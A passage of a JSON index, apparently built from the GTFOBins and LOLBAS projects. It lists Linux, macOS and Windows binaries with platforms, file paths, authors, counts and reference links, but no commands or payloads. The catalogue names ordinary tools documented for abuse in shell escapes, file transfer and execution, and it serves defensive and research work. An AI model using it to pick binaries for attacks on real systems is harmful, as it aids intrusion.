Bins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpm/"],"count":10},{"id":"gtfo:rpmdb","name":"rpmdb","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"count":6},{"id":"gtfo:rpmquery","name":"rpmquery","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"count":6},{"id":"gtfo:rpmverify","name":"rpmverify","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"count":6},{"id":"gtfo:rsync","name":"rsync","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rsync/"],"count":3},{"id":"gtfo:rsyslogd","name":"rsyslogd","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rsyslogd/"],"count":1},{"id":"gtfo:rtorrent","name":"rtorrent","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rtorrent/"],"count":3},{"id":"gtfo:ruby","name":"ruby","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ruby/"],"count":15},{"id":"gtfo:run-mailcap","name":"run-mailcap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/run-mailcap/"],"count":4},{"id":"gtfo:run-parts","name":"run-parts","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/run-parts/"],"count":6},{"id":"gtfo:runscript","name":"runscript","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/runscript/"],"count":3},{"id":"gtfo:rustc","name":"rustc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustc/"],"count":6},{"id":"gtfo:rustdoc","name":"rustdoc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustdoc/"],"count":4},{"id":"gtfo:rustfmt","name":"rustfmt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustfmt/"],"count":2},{"id":"gtfo:rustup","name":"rustup","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustup/"],"count":4},{"id":"gtfo:sash","name":"sash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sash/"],"count":3},{"id":"gtfo:scanmem","name":"scanmem","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/scanmem/"],"count":3},{"id":"gtfo:scp","name":"scp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/scp/"],"count":12},{"id":"gtfo:screen","name":"screen","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/screen/"],"count":6},{"id":"gtfo:script","name":"script","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/script/"],"count":6},{"id":"gtfo:scrot","name":"scrot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/scrot/"],"count":3},{"id":"gtfo:sed","name":"sed","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sed/"],"count":12},{"id":"gtfo:service","name":"service","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/service/"],"count":2},{"id":"gtfo:setarch","name":"setarch","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setarch/"],"count":3},{"id":"gtfo:setcap","name":"setcap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setcap/"],"count":2},{"id":"gtfo:setfacl","name":"setfacl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setfacl/"],"count":2},{"id":"gtfo:setlock","name":"setlock","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setlock/"],"count":3},{"id":"gtfo:sftp","name":"sftp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sftp/"],"count":9},{"id":"gtfo:sg","name":"sg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sg/"],"count":2},{"id":"gtfo:shred","name":"shred","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/shred/"],"count":3},{"id":"gtfo:shuf","name":"shuf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/shuf/"],"count":6},{"id":"gtfo:slsh","name":"slsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/slsh/"],"count":3},{"id":"gtfo:smbclient","name":"smbclient","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/smbclient/"],"count":6},{"id":"gtfo:snap","name":"snap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/snap/"],"count":1},{"id":"gtfo:socat","name":"socat","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/socat/"],"count":21},{"id":"gtfo:socket","name":"socket","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/socket/"],"count":6},{"id":"gtfo:soelim","name":"soelim","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/soelim/"],"count":3},{"id":"gtfo:softlimit","name":"softlimit","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/softlimit/"],"count":3},{"id":"gtfo:sort","name":"sort","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sort/"],"count":6},{"id":"gtfo:split","name":"split","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/split/"],"count":9},{"id":"gtfo:sqlite3","name":"sqlite3","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"count":9},{"id":"gtfo:sqlmap","name":"sqlmap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sqlmap/"],"count":2},{"id":"gtfo:ss","name":"ss","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ss/"],"count":3},{"id":"gtfo:ssh","name":"ssh","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh/"],"count":16},{"id":"gtfo:ssh-agent","name":"ssh-agent","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-agent/"],"count":3},{"id":"gtfo:ssh-copy-id","name":"ssh-copy-id","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"],"count":4},{"id":"gtfo:ssh-keygen","name":"ssh-keygen","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"],"count":3},{"id":"gtfo:ssh-keyscan","name":"ssh-keyscan","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"],"count":3},{"id":"gtfo:sshfs","name":"sshfs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sshfs/"],"count":6},{"id":"gtfo:sshpass","name":"sshpass","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sshpass/"],"count":3},{"id":"gtfo:sshuttle","name":"sshuttle","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sshuttle/"],"count":1},{"id":"gtfo:start-stop-daemon","name":"start-stop-daemon","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"],"count":3},{"id":"gtfo:stdbuf","name":"stdbuf","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/stdbuf/"],"count":3},{"id":"gtfo:strace","name":"strace","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/strace/"],"count":5},{"id":"gtfo:strings","name":"strings","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/strings/"],"count":3},{"id":"gtfo:su","name":"su","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/su/"],"count":1},{"id":"gtfo:sudo","name":"sudo","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sudo/"],"count":1},{"id":"gtfo:sysctl","name":"sysctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sysctl/"],"count":5},{"id":"gtfo:systemctl","name":"systemctl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/systemctl/"],"count":6},{"id":"gtfo:systemd-resolve","name":"systemd-resolve","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/systemd-resolve/"],"count":1},{"id":"gtfo:systemd-run","name":"systemd-run","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/systemd-run/"],"count":3},{"id":"gtfo:tac","name":"tac","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tac/"],"count":3},{"id":"gtfo:tail","name":"tail","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tail/"],"count":3},{"id":"gtfo:tailscale","name":"tailscale","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tailscale/"],"count":1},{"id":"gtfo:tar","name":"tar","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tar/"],"count":21},{"id":"gtfo:task","name":"task","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/task/"],"count":3},{"id":"gtfo:taskset","name":"taskset","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/taskset/"],"count":2},{"id":"gtfo:tasksh","name":"tasksh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tasksh/"],"count":3},{"id":"gtfo:tbl","name":"tbl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tbl/"],"count":3},{"id":"gtfo:tclsh","name":"tclsh","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tclsh/"],"count":10},{"id":"gtfo:tcpdump","name":"tcpdump","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"count":7},{"id":"gtfo:tcsh","name":"tcsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tcsh/"],"count":6},{"id":"gtfo:tdbtool","name":"tdbtool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tdbtool/"],"count":3},{"id":"gtfo:tee","name":"tee","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tee/"],"count":3},{"id":"gtfo:telnet","name":"telnet","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/telnet/"],"count":6},{"id":"gtfo:terraform","name":"terraform","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/terraform/"],"count":3},{"id":"gtfo:tex","name":"tex","source":"GTFOBins","platform":["Linux"],"aliases":["xetex"],"references":["https://gtfobins.github.io/gtfobins/tex/"],"count":3},{"id":"gtfo:tftp","name":"tftp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tftp/"],"count":6},{"id":"gtfo:tic","name":"tic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tic/"],"count":3},{"id":"gtfo:time","name":"time","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/time/"],"count":3},{"id":"gtfo:timedatectl","name":"timedatectl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/timedatectl/"],"count":2},{"id":"gtfo:timeout","name":"timeout","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/timeout/"],"count":3},{"id":"gtfo:tmate","name":"tmate","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tmate/"],"count":3},{"id":"gtfo:tmux","name":"tmux","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tmux/"],"count":9},{"id":"gtfo:top","name":"top","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/top/"],"count":2},{"id":"gtfo:torify","name":"torify","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/torify/"],"count":2},{"id":"gtfo:torsocks","name":"torsocks","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/torsocks/"],"count":2},{"id":"gtfo:troff","name":"troff","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/troff/"],"count":3},{"id":"gtfo:tsc","name":"tsc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tsc/"],"count":4},{"id":"gtfo:tshark","name":"tshark","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tshark/"],"count":2},{"id":"gtfo:ul","name":"ul","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ul/"],"count":3},{"id":"gtfo:unexpand","name":"unexpand","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unexpand/"],"count":3},{"id":"gtfo:uniq","name":"uniq","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/uniq/"],"count":3},{"id":"gtfo:unshare","name":"unshare","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unshare/"],"count":3},{"id":"gtfo:unsquashfs","name":"unsquashfs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unsquashfs/"],"count":2},{"id":"gtfo:unzip","name":"unzip","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unzip/"],"count":2},{"id":"gtfo:update-alternatives","name":"update-alternatives","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/update-alternatives/"],"count":2},{"id":"gtfo:urlget","name":"urlget","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/urlget/"],"count":3},{"id":"gtfo:uuencode","name":"uuencode","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/uuencode/"],"count":3},{"id":"gtfo:uv","name":"uv","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/uv/"],"count":2},{"id":"gtfo:vagrant","name":"vagrant","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vagrant/"],"count":2},{"id":"gtfo:valgrind","name":"valgrind","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/valgrind/"],"count":2},{"id":"gtfo:varnishncsa","name":"varnishncsa","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/varnishncsa/"],"count":2},{"id":"gtfo:vi","name":"vi","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vi/"],"count":18},{"id":"gtfo:vigr","name":"vigr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vigr/"],"count":2},{"id":"gtfo:vim","name":"vim","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["nvim","rvim","view","vimdiff"],"references":["https://gtfobins.github.io/gtfobins/vim/"],"count":12},{"id":"gtfo:vipw","name":"vipw","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vipw/"],"count":2},{"id":"gtfo:virsh","name":"virsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/virsh/"],"count":5},{"id":"gtfo:volatility","name":"volatility","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/volatility/"],"count":3},{"id":"gtfo:w3m","name":"w3m","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/w3m/"],"count":3},{"id":"gtfo:wall","name":"wall","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wall/"],"count":1},{"id":"gtfo:watch","name":"watch","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/watch/"],"count":6},{"id":"gtfo:wc","name":"wc","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wc/"],"count":3},{"id":"gtfo:wg-quick","name":"wg-quick","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wg-quick/"],"count":1},{"id":"gtfo:wget","name":"wget","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wget/"],"count":18},{"id":"gtfo:whiptail","name":"whiptail","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/whiptail/"],"count":3},{"id":"gtfo:whois","name":"whois","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/whois/"],"count":6},{"id":"gtfo:wireshark","name":"wireshark","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wireshark/"],"count":4},{"id":"gtfo:wish","name":"wish","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wish/"],"count":3},{"id":"gtfo:xargs","name":"xargs","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xargs/"],"count":12},{"id":"gtfo:xdg-user-dir","name":"xdg-user-dir","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xdg-user-dir/"],"count":2},{"id":"gtfo:xdotool","name":"xdotool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xdotool/"],"count":3},{"id":"gtfo:xmodmap","name":"xmodmap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xmodmap/"],"count":3},{"id":"gtfo:xmore","name":"xmore","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xmore/"],"count":3},{"id":"gtfo:xpad","name":"xpad","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xpad/"],"count":3},{"id":"gtfo:xxd","name":"xxd","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xxd/"],"count":6},{"id":"gtfo:xz","name":"xz","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xz/"],"count":3},{"id":"gtfo:yarn","name":"yarn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yarn/"],"count":6},{"id":"gtfo:yash","name":"yash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yash/"],"count":3},{"id":"gtfo:yelp","name":"yelp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yelp/"],"count":2},{"id":"gtfo:yt-dlp","name":"yt-dlp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yt-dlp/"],"count":2},{"id":"gtfo:yum","name":"yum","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yum/"],"count":3},{"id":"gtfo:zathura","name":"zathura","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zathura/"],"count":2},{"id":"gtfo:zcat","name":"zcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zcat/"],"count":2},{"id":"gtfo:zgrep","name":"zgrep","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zgrep/"],"count":2},{"id":"gtfo:zic","name":"zic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zic/"],"count":3},{"id":"gtfo:zip","name":"zip","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zip/"],"count":6},{"id":"gtfo:zless","name":"zless","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zless/"],"count":3},{"id":"gtfo:zsh","name":"zsh","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zsh/"],"count":24},{"id":"gtfo:zsoelim","name":"zsoelim","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zsoelim/"],"count":3},{"id":"gtfo:zypper","name":"zypper","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zypper/"],"count":4},{"id":"lolbas:addinutil-exe","name":"AddinUtil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\AddInUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\AddInUtil.exe"],"author":"Michael McKinley @MckinleyMike","created":"2023-10-05T00:00:00.000Z","contributors":["Michael McKinley @MckinleyMike","Tony Latteri @TheLatteri"],"references":["https://lolbas-project.github.io/lolbas/Binaries/AddinUtil/"],"count":1},{"id":"lolbas:appinstaller-exe","name":"AppInstaller.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"],"author":"Wade Hickey","created":"2020-12-02T00:00:00.000Z","contributors":["Wade Hickey @notwhickey"],"references":["https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/"],"count":1},{"id":"lolbas:applaunch-exe","name":"Applaunch.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Applaunch.exe"],"author":"Nathan Sawyer","created":"2026-08-08T00:00:00.000Z","contributors":["Nathan Sawyer"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Applaunch/"],"count":1},{"id":"lolbas:aspnet-compiler-exe","name":"Aspnet_Compiler.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe","c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["cpl @cpl3h"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/"],"count":1},{"id":"lolbas:at-exe","name":"At.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\WINDOWS\\System32\\At.exe","C:\\WINDOWS\\SysWOW64\\At.exe"],"author":"Freddie Barr-Smith","created":"2019-09-20T00:00:00.000Z","contributors":["Freddie Barr-Smith","Riccardo Spolaor","Mariano Graziano","Xabier Ugarte-Pedrero"],"references":["https://lolbas-project.github.io/lolbas/Binaries/At/"],"count":1},{"id":"lolbas:atbroker-exe","name":"Atbroker.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Atbroker.exe","C:\\Windows\\SysWOW64\\Atbroker.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Atbroker/"],"count":1},{"id":"lolbas:bash-exe","name":"Bash.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Alex Ionescu @aionescu","Asif Matadar @d1r4c","Liran Ravich, CardinalOps"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Bash/"],"count":5},{"id":"lolbas:bitsadmin-exe","name":"Bitsadmin.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Rob Fuller @mubix","Chris Gates @carnal0wnage","Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"],"count":4},{"id":"lolbas:certoc-exe","name":"CertOC.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\certoc.exe","c:\\windows\\syswow64\\certoc.exe"],"author":"Ensar Samil","created":"2021-10-07T00:00:00.000Z","contributors":["Ensar Samil @sblmsrsn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/CertOC/"],"count":2},{"id":"lolbas:certreq-exe","name":"CertReq.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\certreq.exe","C:\\Windows\\SysWOW64\\certreq.exe"],"author":"David Middlehurst","created":"2020-07-07T00:00:00.000Z","contributors":["David Middlehurst @dtmsecurity"],"references":["https://lolbas-project.github.io/lolbas/Binaries/CertReq/"],"count":2},{"id":"lolbas:certutil-exe","name":"Certutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","Moriarty @Moriarty_Meng","egre55 @egre55","Lior Adar","Adam @hexacorn","SomeTestLeper @SomeTestLeper"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"count":7},{"id":"lolbas:change-exe","name":"Change.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\change.exe","c:\\windows\\syswow64\\change.exe"],"author":"Idan Lerman","created":"2025-07-31T00:00:00.000Z","contributors":["Idan Lerman @IdanLerman"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Change/"],"count":1},{"id":"lolbas:cipher-exe","name":"Cipher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\cipher.exe","c:\\windows\\syswow64\\cipher.exe"],"author":"Adetutu Ogunsowo","created":"2024-11-22T00:00:00.000Z","contributors":["Ade Ogunsowo @i_am_tutu","Alexander Sennhauser @conitrade"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cipher/"],"count":2},{"id":"lolbas:cmd-exe","name":"Cmd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"author":"Ye Yint Min Thu 